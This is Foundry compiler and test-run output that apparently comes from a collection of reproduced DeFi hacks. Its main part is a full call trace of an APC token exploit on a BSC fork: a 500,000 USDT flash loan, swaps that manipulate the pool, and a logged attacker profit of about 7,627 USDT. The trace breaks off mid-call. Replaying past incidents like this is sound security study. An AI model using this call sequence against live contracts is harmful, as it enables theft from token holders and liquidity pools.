Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.08s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-12/APC_exp.sol:20:5:
   |
20 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/APC_exp.sol:41:31:
   |
41 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) public {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/APC_exp.sol:41:47:
   |
41 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) public {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/APC_exp.sol:41:67:
   |
41 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) public {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-12/APC_exp.sol:41:88:
   |
41 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) public {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 854.38ms (1.97ms CPU time)

Ran 1 test for src/test/2022-12/APC_exp.sol:ContractTest
[PASS] testExploit() (gas: 844617)
Logs:
  [End] Attacker USDT balance after exploit: 7626.987133757734534775

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 23527906 [2.352e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [1043017] ContractTest::testExploit()
    ├─ [25295] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [25295] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::approve(0x5a88114F02bfFb04a9A13a776f592547B3080237, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a88114F02bfFb04a9A13a776f592547B3080237, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x95e76b7acba54050619e6b5210bc5b576b2b169a113311897f5343545716a460: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24665] 0x473C33C55bE10bB53D81fe45173fcc444143a13e::approve(0x5a88114F02bfFb04a9A13a776f592547B3080237, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x5a88114F02bfFb04a9A13a776f592547B3080237, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x95e76b7acba54050619e6b5210bc5b576b2b169a113311897f5343545716a460: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [910664] 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681::flashLoan(0, 500000000000000000000000 [5e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 500000000000000000000000 [5e23])
    │   │   ├─ emit Transfer(from: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 500000000000000000000000 [5e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0xa1bb3ea675b840e963c59cc969a45ddfeefd63ae58d64dc7dba145305988350c: 0x00000000000000000000000000000000000000000000c56b61952b94d58a96df → 0x000000000000000000000000000000000000000000005b8a53adc51e050a96df
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000069e10de76676d0800000
    │   │   └─ ← [Return] true
    │   ├─ [854350] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 500000000000000000000000 [5e23], 0x00)
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 500000000000000000000000 [5e23]
    │   │   ├─ [156365] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(500000000000000000000000 [5e23], 0, [0x55d398326f99059fF775485246999027B3197955, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1669888304 [1.669e9])
    │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 500000000000000000000000 [5e23])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 500000000000000000000000 [5e23])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563539457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000069e10de76676d0800000 → 0
    │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001d339c85225986d416aa2 → 0x000000000000000000000000000000000000000000023d1ad6398c0f3dc16aa2
    │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffff961ef21899892f7fffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 2911002779654852487833915 [2.911e24], 2206411046553418033359522 [2.206e24], 1669887830 [1.669e9]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   └─ ← [Return] 2706411046553418033359522 [2.706e24]
    │   │   │   ├─ [128643] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::swap(536700999078277303751761 [5.367e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [93914] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 536700999078277303751761 [5.367e23])
    │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2911002779654852487833915 [2.911e24], 2206411046553418033359522 [2.206e24], 1669887830 [1.669e9]
    │   │   │   │   │   ├─ [2886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2911002779654852487833915 [2.911e24]
    │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 525966979096711757676726 [5.259e23])
    │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 2683504995391386518758 [2.683e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: 0x0000000000000000000000000000000000000000, value: 2683504995391386518758 [2.683e21])
    │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: 0x46989EEc5A978c766F108Fee75c6c12dBFA313Ef, value: 5367009990782773037517 [5.367e21])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x154ed8d3d46f6828e5e29dbb341cabc8d0d90d2faa1e11d330d8b794e667e477: 0x0000000000000000000000000000000000000000000058aa668e417e28c42a3d → 0x0000000000000000000000000000000000000000000059cd58c81078dc77340a
    │   │   │   │   │   │   @ 19: 0x0000000000000000000000000000000000000000000000010508efdfeb3e3932 → 0x0000000000000000000000000000000000000000000000927e25d75d4517be18
    │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000002686dc6e24e5aee1a693b → 0x00000000000000000000000000000000000000000001f6c7284d746cbc2a94ea
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000006f60ba213bf8ca89c0b6
    │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x00000000000000000000000000000000000000000000004080cc6ed110a6b1ef → 0x0000000000000000000000000000000000000000000000d1f9e9564e6a8036d5
    │   │   │   │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0x0000000000000000000000000000000000000000000051eb7ea3dd7b2964b7a7 → 0x00000000000000000000000000000000000000000000527cf7c0c4f8833e3c8d
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2706411046553418033359522 [2.706e24]
    │   │   │   │   ├─ emit Sync(reserve0: 2374301780576575184082154 [2.374e24], reserve1: 2706411046553418033359522 [2.706e24])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 500000000000000000000000 [5e23], amount0Out: 536700999078277303751761 [5.367e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x6388775600000001d339c85225986d416aa200000002686dc6e24e5aee1a693b → 0x63887930000000023d1ad6398c0f3dc16aa200000001f6c7284d746cbc2a94ea
    │   │   │   │   │   @ 10: 0x000000000000000000000000000000c6fff7831d2d1e95a7a2261b6a5aa86320 → 0x000000000000000000000000000000c70268e0e91ad8633e3b1f9ac63dd3477a
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000ca9c388d3181b96093f73f6f3d5f07022f → 0x000000000000000000000000000000ca9d9fd290c8130b4aa5a66d307d03be2b
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 525966979096711757676726 [5.259e23]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [312267] 0x5a88114F02bfFb04a9A13a776f592547B3080237::swap(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x473C33C55bE10bB53D81fe45173fcc444143a13e, 100000000000000000000000 [1e23])
    │   │   │   ├─ [304930] 0xc6Fc79db585BF2cC613913F3c24B999a676944Ac::swap(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x473C33C55bE10bB53D81fe45173fcc444143a13e, 100000000000000000000000 [1e23]) [delegatecall]
    │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24], 2706411046553418033359522 [2.706e24], 1669888304 [1.669e9]
    │   │   │   │   ├─ [1021] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountOut(1000000000000000000 [1e18], 2374301780576575184082154 [2.374e24], 2706411046553418033359522 [2.706e24]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1137026433134201757 [1.137e18]
    │   │   │   │   ├─ [258290] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x5a88114F02bfFb04a9A13a776f592547B3080237, 100000000000000000000000 [1e23])
    │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24], 2706411046553418033359522 [2.706e24], 1669888304 [1.669e9]
    │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24]
    │   │   │   │   │   ├─ [2439] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2362331733767777168741523 [2.362e24]
    │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1351157271490051432204 [1.351e21])
    │   │   │   │   │   ├─ [69102] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(1351157271490051432204 [1.351e21], 0, [0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955], 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 1669888304 [1.669e9])
    │   │   │   │   │   │   ├─ [18503] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::transferFrom(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, 1351157271490051432204 [1.351e21])
    │   │   │   │   │   │   │   ├─ [465] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::token0() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025
    │   │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24], 2706411046553418033359522 [2.706e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, to: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, value: 1351157271490051432204 [1.351e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x00000000000000000000000000000000000000000001f6c7284d746cbc2a94ea → 0x00000000000000000000000000000000000000000001f7106760601b5eb673f6
    │   │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0x0000000000000000000000000000000000000000000000493f12ebaea28bdf0c → 0
    │   │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000000d1f9e9564e6a8036d5 → 0x000000000000000000000000000000000000000000000088bad66a9fc7f457c9
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2374301780576575184082154 [2.374e24], 2706411046553418033359522 [2.706e24], 1669888304 [1.669e9]
    │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2375652937848065235514358 [2.375e24]
    │   │   │   │   │   │   ├─ [38616] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::swap(0, 1535430586760422854544 [1.535e21], 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 0x)
    │   │   │   │   │   │   │   ├─ [23171] 0x55d398326f99059fF775485246999027B3197955::transfer(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8, to: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, value: 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x317a211acee417ea6369bcca994cc5ff96f957ce922197f8f408c7c4caca9c20: 0 → 0x0000000000000000000000000000000000000000000000533c613f9944998f90
    │   │   │   │   │   │   │   │   │   @ 0xcf04451b6789b4f573aaa3d18daf0ceed828dfafdbeb8213590a0ee21d76a6c3: 0x000000000000000000000000000000000000000000023d1ad6398c0f3dc16aa2 → 0x000000000000000000000000000000000000000000023cc799d84c75f927db12
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [886] 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2375652937848065235514358 [2.375e24]
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 2704875615966657610504978 [2.704e24]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 2375652937848065235514358 [2.375e24], reserve1: 2704875615966657610504978 [2.704e24])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 1351157271490051432204 [1.351e21], amount1In: 0, amount0Out: 0, amount1Out: 1535430586760422854544 [1.535e21], to: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x63887930000000023d1ad6398c0f3dc16aa200000001f6c7284d746cbc2a94ea → 0x63887930000000023cc799d84c75f927db1200000001f7106760601b5eb673f6
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 1535430586760422854544 [1.535e21]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1535430586760422854544 [1.535e21]
    │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1351157271490051432204 [1.351e21])
    │   │   │   │   │   ├─ [15634] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, to: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0xEaBe34b7c959065fc0C3C2EB651F99C721d0368a, spender: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, value: 999999805092241632238608146170 [9.999e29])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x317a211acee417ea6369bcca994cc5ff96f957ce922197f8f408c7c4caca9c20: 0x0000000000000000000000000000000000000000000000533c613f9944998f90 → 0
    │   │   │   │   │   │   │   @ 0x4eb8100826f84a2b17c3623b68340681022535475270e97b85780e4616f0c265: 0x0000000000000000000000000000000000000000000000d0ca4cbbe0e0fe0000 → 0x00000000000000000000000000000000000000000000012406adfb7a25978f90
    │   │   │   │   │   │   │   @ 0x6961c91e0e1ce81436fde2fd79d2f70f4e7b89cd6c8dd58d553d8ad616274406: 0x000000000000000000000000000000000000000c9f2c73dd8a52eb98bd2eee8a → 0x000000000000000000000000000000000000000c9f2c738a4df1abff78955efa
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 1535430586760422854544 [1.535e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x41c1cac03a0930a470a3759d68699d5551621f70c543fe08cc3b02b92e3dafce: 0 → 0x0000000000000000000000000000000000000000000000533c613f9944998f90
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [94387] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955, 1351157271490051432204 [1.351e21], 1535430586760422854544 [1.535e21], 0, 0, 0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 1669888304 [1.669e9])
    │   │   │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(0x2AA504586d6CaB3C59Fa629f74c586d78b93A025, 0x55d398326f99059fF775485246999027B3197955) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8
    │   │   │   │   │   │   ├─ [893] 0x3DE032D5D11c94d2d79dBa0c34D7851FFAA05DD8::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 2375652937848065235514358 [2.375e24], 2704875615966657610504978 [2.704e24], 1669888304 [1.669e9]
